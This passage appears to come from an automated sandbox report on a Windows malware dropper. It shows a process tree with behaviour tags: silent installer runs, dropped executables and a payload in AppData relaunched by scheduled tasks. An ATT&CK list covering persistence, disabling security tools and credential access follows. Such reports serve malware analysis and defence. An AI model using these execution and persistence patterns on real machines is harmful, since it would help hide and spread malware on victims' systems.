C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2904 -s 1684
8⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:3784

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun03f5d51697d04.exe
4⤵
- Loads dropped DLL
PID:1840

C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03f5d51697d04.exe
Sun03f5d51697d04.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1868

C:\Users\Admin\AppData\Local\Temp\is-UC2GR.tmp\Sun03f5d51697d04.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UC2GR.tmp\Sun03f5d51697d04.tmp" /SL5="$5015C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03f5d51697d04.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1300

C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03f5d51697d04.exe
"C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03f5d51697d04.exe" /SILENT
7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:524

C:\Users\Admin\AppData\Local\Temp\is-7SA3M.tmp\Sun03f5d51697d04.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7SA3M.tmp\Sun03f5d51697d04.tmp" /SL5="$6015C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03f5d51697d04.exe" /SILENT
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:1248

C:\Users\Admin\AppData\Local\Temp\is-17BI7.tmp\postback.exe
"C:\Users\Admin\AppData\Local\Temp\is-17BI7.tmp\postback.exe" ss1
9⤵
- Executes dropped EXE
PID:2560

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0328255c4bce6fb.exe
4⤵
- Loads dropped DLL
PID:1340

C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun0328255c4bce6fb.exe
Sun0328255c4bce6fb.exe
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:268

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0351a0558292.exe
4⤵
- Loads dropped DLL
PID:2032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun038db98f99bf9a.exe
4⤵
- Loads dropped DLL
PID:1228

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun0324aba28588c0.exe
4⤵
- Loads dropped DLL
PID:1100

C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun038db98f99bf9a.exe
Sun038db98f99bf9a.exe
1⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:288

C:\Users\Admin\Pictures\Adobe Films\BnbpIxC5RaMUqdV08_JMLpxz.exe
"C:\Users\Admin\Pictures\Adobe Films\BnbpIxC5RaMUqdV08_JMLpxz.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 288 -s 1460
2⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2856

C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun0351a0558292.exe
Sun0351a0558292.exe
1⤵
- Executes dropped EXE
PID:784

C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun0324aba28588c0.exe
Sun0324aba28588c0.exe
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:568

C:\Windows\system32\taskeng.exe
taskeng.exe {B8A71648-C2F1-4DCE-9819-BBC0962E72E2} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:3304

C:\Windows\system32\taskeng.exe
taskeng.exe {82FA15F3-0BCF-4A05-8BF1-3F895C4EBC34} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:2460

C:\Program Files\Mozilla Firefox\default-browser-agent.exe
"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task
2⤵
PID:1588

C:\Windows\system32\taskeng.exe
taskeng.exe {30ACE16C-3036-4842-887E-2F0777181E87} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1208

C:\Windows\system32\taskeng.exe
taskeng.exe {D79F1DC9-584F-48AF-B3B6-9FED6C92A61F} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:2184

C:\Users\Admin\AppData\Roaming\rubjrie
C:\Users\Admin\AppData\Roaming\rubjrie
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1340

C:\Users\Admin\AppData\Roaming\rubjrie
C:\Users\Admin\AppData\Roaming\rubjrie
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2576

C:\Windows\system32\taskeng.exe
taskeng.exe {E4458B1C-1B45-4CD1-83DC-DA06B03BA4F5} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:3240

C:\Windows\system32\taskeng.exe
taskeng.exe {A93E91ED-18D0-4FEF-B980-679C4C5E17AA} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:908

C:\Users\Admin\AppData\Roaming\rubjrie
C:\Users\Admin\AppData\Roaming\rubjrie
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2324

C:\Users\Admin\AppData\Roaming\rubjrie
C:\Users\Admin\AppData\Roaming\rubjrie
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2136

C:\Windows\system32\taskeng.exe
taskeng.exe {1588C7E1-306E-4582-98FE-B74CBF4576C1} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:2984

C:\Users\Admin\AppData\Roaming\rubjrie
C:\Users\Admin\AppData\Roaming\rubjrie
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3220

C:\Windows\system32\taskeng.exe
taskeng.exe {8944224B-FAAE-4040-B3D7-0B182F282BDE} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:4000

C:\Users\Admin\AppData\Roaming\rubjrie
C:\Users\Admin\AppData\Roaming\rubjrie
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3676

C:\Windows\system32\taskeng.exe
taskeng.exe {DBF51DCC-482A-425D-9125-C1E783CB792E} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:2984

C:\Users\Admin\AppData\Roaming\rubjrie
C:\Users\Admin\AppData\Roaming\rubjrie
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3884

C:\Windows\system32\taskeng.exe
taskeng.exe {83C8B9D5-9CC6-490F-BAA1-E0220A4A24A6} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:304

C:\Users\Admin\AppData\Roaming\rubjrie
C:\Users\Admin\AppData\Roaming\rubjrie
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3760

C:\Users\Admin\AppData\Roaming\rubjrie
C:\Users\Admin\AppData\Roaming\rubjrie
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1132

C:\Users\Admin\AppData\Roaming\rubjrie
C:\Users\Admin\AppData\Roaming\rubjrie
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1076

C:\Users\Admin\AppData\Roaming\rubjrie
C:\Users\Admin\AppData\Roaming\rubjrie
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2856

C:\Windows\system32\taskeng.exe
taskeng.exe {E8249D7D-06AE-4CE1-A560-E44CC03453F3} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:1108

C:\Windows\system32\taskeng.exe
taskeng.exe {61AA83B0-9DCA-4A11-B65A-B052056DC9DC} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:3208

C:\Users\Admin\AppData\Roaming\rubjrie
C:\Users\Admin\AppData\Roaming\rubjrie
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2688

C:\Windows\system32\taskeng.exe
taskeng.exe {57A111E9-F830-475A-AB46-63EC6F4F29AB} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:2996

C:\Users\Admin\AppData\Roaming\rubjrie
C:\Users\Admin\AppData\Roaming\rubjrie
2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4000

C:\Windows\system32\taskeng.exe
taskeng.exe {43CF3700-1E66-498C-886E-D14A237D4C71} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:3624

C:\Users\Admin\AppData\Roaming\rubjrie
C:\Users\Admin\AppData\Roaming\rubjrie
2⤵
PID:3856

C:\Windows\system32\taskeng.exe
taskeng.exe {43FCC5DC-1DB9-4856-A76B-C3A47A6A77E7} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:2452

C:\Windows\system32\taskeng.exe
taskeng.exe {2588C268-8A98-4819-B547-A44DAE026A20} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]
1⤵
PID:1756

C:\Users\Admin\AppData\Roaming\rubjrie
C:\Users\Admin\AppData\Roaming\rubjrie
2⤵
PID:3332

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery